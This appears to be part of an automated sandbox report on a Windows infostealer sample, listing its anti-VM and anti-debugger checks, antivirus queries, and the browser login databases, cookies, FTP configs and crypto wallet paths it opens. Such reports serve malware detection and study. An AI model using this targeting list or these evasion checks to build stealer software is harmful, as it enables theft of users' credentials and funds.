                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53907CC second address: 5390814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39718h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4BA0D39712h 0x0000000f sbb cx, A5B8h 0x00000014 jmp 00007F4BA0D3970Bh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390814 second address: 5390826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390826 second address: 5390849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F4BA0D3970Bh 0x00000012 pop eax 0x00000013 movsx ebx, ax 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390849 second address: 539085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53908BC second address: 53908C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Special instruction interceptor: First address: E47C6C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Special instruction interceptor: First address: EC8E87 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7508 Thread sleep time: -34017s >= -30000s
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7604 Thread sleep time: -300000s >= -30000s
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7496 Thread sleep time: -30015s >= -30000s
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7504 Thread sleep time: -30015s >= -30000s
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7484 Thread sleep time: -40020s >= -30000s
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Last function: Thread delayed
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: Amcache.hve.5.dr Binary or memory string: VMware
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696503903o
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.00000000015F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696503903s
                Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
                Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
                Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696503903j
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696503903f
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E44000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696503903p
                Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: jSFUzuYPG9.exe, 00000000.00000002.1974867741.0000000000E28000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: Amcache.hve.5.dr Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
                Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
                Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696503903x
                Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696503903
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696503903
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696503903
                Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NVMware2
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696503903t
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: jSFUzuYPG9.exe, 00000000.00000002.1974867741.0000000000E28000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: NTICE
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: SICE
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: jSFUzuYPG9.exe, 00000000.00000002.1975085759.0000000000E69000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: nProgram Manager
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
                Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000003.1499562858.00000000016AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: jSFUzuYPG9.exe String found in binary or memory: Wallets/Electrum
                Source: jSFUzuYPG9.exe String found in binary or memory: Wallets/ElectronCash
                Source: jSFUzuYPG9.exe String found in binary or memory: window-state.json
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451476737.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Jaxx Libertyn
                Source: jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: jSFUzuYPG9.exe String found in binary or memory: Wallets/Ethereum
                Source: jSFUzuYPG9.exe, 00000000.00000003.1477686530.00000000016A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.js
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.json
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.db
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\AFWAAFRXKO
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\QVTVNIBKSD
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\MQAWXUYAIK
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: number of queries: 1001
                Source: Yara match File source: 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
